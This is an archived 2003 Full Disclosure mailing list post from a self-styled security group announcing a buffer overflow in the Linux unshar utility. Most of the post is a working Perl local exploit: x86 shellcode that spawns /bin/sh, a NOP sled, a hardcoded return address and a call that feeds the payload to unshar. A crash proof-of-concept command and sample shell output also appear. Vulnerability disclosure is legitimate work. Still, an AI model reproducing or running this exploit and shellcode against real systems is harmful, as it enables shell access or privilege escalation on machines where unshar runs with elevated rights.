Full Disclosure mailing list archives
flames security group start to play , yet another vuln found (rustymemory and welshboi)
From: rustymemory <rustymemory () cisco-ninjas com>
Date: Wed, 3 Dec 2003 17:36:30 +0000
By: flames.bluefox.net.nz if unshar suid; then you w00t proof of concept? rustymemory@flames:~$ unshar -f `perl -e 'print"A"x2000'` ............................AAAAAAAAAAAAAASegmentation fault welshboi@flames:~$ more unshar.pl #!/usr/bin/perl #/usr/bin/unshar local sploit. #coded by welshboi (deadbeat) #found by rustymemory # #FLAMES SECURITY GROUP #Private, please dont distribute #affects all linux distributions , tested on slackware 9.1 and MDK ############################################### #[deadbeat@pikachu sploits]$ perl unshar.pl # # # #[] /usr/bin/unshar exploit # #[] coded by: deadbeat [] # #[] found by: rustymemory [] # #_f1GWugHu[SPZ # # # #sh-2.05b$ # ############################################### # 47byte shellcode (exec /bin/sh) $hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b". "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff". "\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01"; $egg = 2000; $buf = 1128; $nop = "\x90"; $offset = 0; $ret =0x40055bdc; if(@ARGV == 1) {$offset = $ARGV[0];} $addr = pack('l', ($ret + $offset)); for($i = 0; $i<$buf; $i += 4){$evil .=$addr;} for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;} $evil .= $hell; print "\n[] /usr/bin/unshar exploit []\n"; print "[] coded by: deadbeat, uk2sec []\n"; print "[] found by: rustymemory []\n\n"; print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n"); system("/usr/bin/unshar -f $evil"); --------------------------------------------------------- shouts to ? calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest of flames security group. and rusty's fiancee _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- flames security group start to play , yet another vuln found (rustymemory and welshboi) rustymemory (Dec 03)